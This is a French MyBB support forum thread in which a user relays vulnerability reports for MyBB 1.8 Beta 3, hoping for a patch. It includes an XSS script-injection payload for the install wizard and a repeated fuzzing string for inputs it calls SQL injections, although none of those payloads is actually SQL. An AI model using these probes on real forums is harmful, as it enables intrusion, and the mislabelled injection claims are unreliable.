MyBB 1.8 Beta 3 - Multiple Vulnerabilities - Version imprimable +- MyBB.support, le portail francophone de MyBB (https://mybb.fr) +-- Forum : MyBB.fr (https://mybb.fr/forum-1.html) +--- Forum : Support (https://mybb.fr/forum-5.html) +--- Sujet : MyBB 1.8 Beta 3 - Multiple Vulnerabilities (/thread-7040.html) |
MyBB 1.8 Beta 3 - Multiple Vulnerabilities - Mac2.0 - 10-09-2014 Bonjours a tous je fais un post juste pour vous communiquer quelques fails que j'ai trouvé sur un site par rapport a MyBB 1.8 Beta 3 : LES EXPLOITS : a) Cross Site Scripting in Installation Wizard ( Board Configuration ) Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php Now let's finish setup and go to the homepage. b) SQL Injection in Private Messages ( User CP ) Go to -> Inbox, for example:localhost/private.php Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload c) SQL Injection in Showthread Go to -> Show Thread, for example:localhost/showthread.php?tid=1 Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload d) SQL Injection in Search Go to -> Search, for example:localhost/search.php Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload e) SQL Injection in Help Documents Go to -> Help Documents, for example:localhost/misc.php?action=help Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload f) SQL Injection in Forum Display Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2 Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload Voila en espérant qu'un patch pourrait être trouver . Cordialement. |